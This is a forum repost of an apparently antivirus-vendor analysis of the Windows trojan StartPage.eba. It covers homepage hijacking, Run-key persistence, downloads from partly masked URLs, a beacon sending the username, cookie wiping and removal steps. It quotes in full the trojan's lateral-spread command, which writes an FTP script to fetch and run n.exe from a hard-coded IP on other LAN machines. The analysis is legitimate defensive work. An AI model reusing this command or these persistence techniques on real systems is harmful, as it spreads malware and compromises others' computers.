Форум - Software - Trojan-Dropper.Win32.StartPage.eba

  • Аватар пользователя Дух Рождества
    Дух Рождества (Информатор) #39730
    11 Октября 2011 года в 16:47:30
  • Технические детали
    Троянская программа, которая устанавливает и запускает другое программное обеспечение на зараженном компьютере без ведома пользователя. Является приложением Windows (PE EXE-файл). Имеет размер 25169 байта. Программа упакована неизвестным упаковщиком. Распакованный размер –около 74 КБ. Написана на C++.

    Деструктивная активность

    Если в пути к файлу троянца отсутствовала последовательность символов "ommon", тогда троянец извлекает из своего тела и запускает на исполнение скрипт со случайным именем:
    %ProgramFiles%\<rnd>.hta
    (md5: D7444767D527E6E97BD3EB85D60E800D)
    <rnd> - последовательность из трех символов латинского алфавита, например, "YSQ".

    Данный файл имеет размер 803 байта и детектируется антивирусом Касперского как Trojan.VBS.StartPage.hw.

    Запуск данного вредоносного скрипта приводит к изменению стартовой страницы, а также поисковой страницы, используемой по умолчанию, браузера Internet Explorer путем добавления следующей информации в ключи системного реестра:
    [HKCU\Software\Microsoft\Internet Explorer\Main]
    "Start Page" = "www.5***ling.com"
    "Search Page" = "www.5***iling.com"
    "default_page_url" = "www.5***ling.com"
    а также обеспечивает автоматический запуск копии троянца при каждом следующем старте системы:
    [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
    "safe360" = "%ProgramFiles%\Common Files\sebsbvx\coiome.exe

    После этого троянец создает копию своего файла с именем "coiome.exe" и удаляет свой оригинальный файл:

    %ProgramFiles%\Common Files\sebsbvx\coiome.exe

    При этом файлу устанавливает дату создания "17.08.2009", а каталогу, в котором находится копия троянца, устанавливает атрибуты "скрытый" и "системный":

    %ProgramFiles%\Common Files\sebsbvx

    При создании своей копии троянец может добавлять в файл случайную последовательность символов, таким образом хэши файлов копий троянца будут различаться. Также троянец может добавлять в файл последовательность символа "2", таким образом увеличивая размер своей копии.

    После этого троянец запускает на исполнение свою копию и завершает выполнение.

    Троянец загружает файл со следующего URL:
    http://j.q***800.com/b.jpg
    сохраняет загруженный файл с именем:

    %WinDir%\Fonts\oh.ini

    Данный фал является файлом конфигурации и используется троянцем в дальнейшем.

    Используя системный файл:
    %System%\sc.exe
    устанавливает автоматический запуск службам со следующими именами:
    lanmanworkstation
    lanmanserver
    RpcLocator
    Browser
    NtLmSsp
    LmHosts

    После этого запускает на исполнение вышеперечисленные службы, используя системный файл:

    %System%\net1.exe

    Далее троянец отправляет запрос на сервер злоумышленника с целью передать в запросе данные о зараженном компьютере:
    http://tj.q***800.com/t/Count.asp?mac=&ver=01&t=<имя пользователя компьютера>

    На момент создания описания с сервера приходил следующий ответ:
    addok

    Для сокрытия своей работы в Интернет в отдельном потоке удаляет файлы из каталогов:
    %userprofile%\Cookies\*.*
    %userprofile%\Local Settings\Temporary Internet Files\*.*
    %userprofile%\Local Settings\Temp\Cookies\*.*

    Перед удалением у файлов снимает атрибуты "только чтение", "скрытый", "системный" и "архивный".

    Создает каталог с именем:
    %AppData%\f.exe

    Удаляет информацию из реестра о службе с именем:

    JavaServe

    Удаляет файлы:
    %ProgramFiles%\Internet Explorer\usp10.dll
    %WinDir%\ModFan\mone.dll
    %WinDir%\UoDo\game.dll

    Троянец извлекает из своего тела файл:
    %WinDir%\Tasks\<rnd2>i.vbe
    <rnd2> - последовательность из 3-х случайных латинских символов.

    Данный файл имеет размер 2117 байт. Файл является вспомогательным и используется для дальнейшей работы троянца.

    После этого извлекает из своего тела файл:
    %WinDir%\Tasks\<rnd3>e.exe
    <rnd3> - последовательность из 3-х случайных букв латинского алфавита, например, "DNP".

    Данный файл детектируется антивирусом Касперского как Exploit.Win32.IMG-WMF.fk.

    В извлеченный файл дописывает время работы компьютера пользователя, таким образом хэш файла будет различаться при каждом создании. Также троянец может добавлять в файл последовательность символа "0", таким образом файл может иметь различный размер от 3748 байт.

    Троянец определяет IP-адрес компьютера пользователя, затем читает и расшифровывает ранее извлеченный файл конфигурации с именем:
    %WinDir%\Fonts\oh.ini
    из этого файла троянец получает один из параметров, с которыми запускает файл:
    %WinDir%\Tasks\e.exe <параметр1> <параметр2>

    <параметр1> - IP-адрес (троянец перебирает IP-адреса локальной сети в которой находился зараженный компьютер)

    <параметр2> - расшифрованный URL, полученный из файла конфигурации.

    На момент создания описания в файле конфигурации была следующая ссылка:

    http://dh***88.org/p/mi.exe (32891 байт, детектируется антивирусом Касперского как Trojan-Downloader.Win32.Geral.adeh)

    После этого выполняет команду следующего вида:

    %System%\cscript.exe %WinDir%\Tasks\<rnd2>i.vbe <IP-адрес атакуемого компьютера> administrator "" "cmd /c @echo open 61.129.51.245>>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get n.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&n.exe&n.exe&del n.exe"
    Таким образом троянец пытается загрузить на атакуемый компьютер и запустить на исполнение файл с FTP-сервера с именем "n.exe", после успешного запуска удаляет этот файл.
    Перед завершением работы удаляет файл:
    %ProgramFiles%\<rnd>.hta

    Рекомендации по удалению

    Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

    Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
    При помощи ( "Диспетчера задач" завершить троянский процесс:
    coiome.exe
    Удалить файлы:
    %ProgramFiles%\<rnd>.hta
    %ProgramFiles%\Common Files\sebsbvx\coiome.exe
    %WinDir%\Fonts\oh.ini
    %WinDir%\Tasks\<rnd2>i.vbe
    %WinDir%\Tasks\<rnd3>e.exe
    Удалить каталог:
    %AppData%\f.exe
    Восстановить измененные значения параметров ключей системного реестра (как работать с реестром?):
    [HKCU\Software\Microsoft\Internet Explorer\Main]
    "Start Page"
    "Search Page"
    "default_page_url"
    Удалить параметр ключа системного реестра:
    [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
    "safe360" = "%ProgramFiles%\Common Files\sebsbvx\coiome.exe
    Очистить каталог Temporary Internet Files, содержащий инфицированные файлы(Как удалить инфицированные файлы в папке Temporary Internet Files?):
    %Temporary Internet Files%
    Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).


    md5:   14210E624FCCF904799E90A589A4B975

    sha1:  3EE389EA35C2264A6586C6A26E1635032C7D2FEB

  • 1
  • Ответить
  • У вас нет прав оставлять комментарии!

Быстрый переход: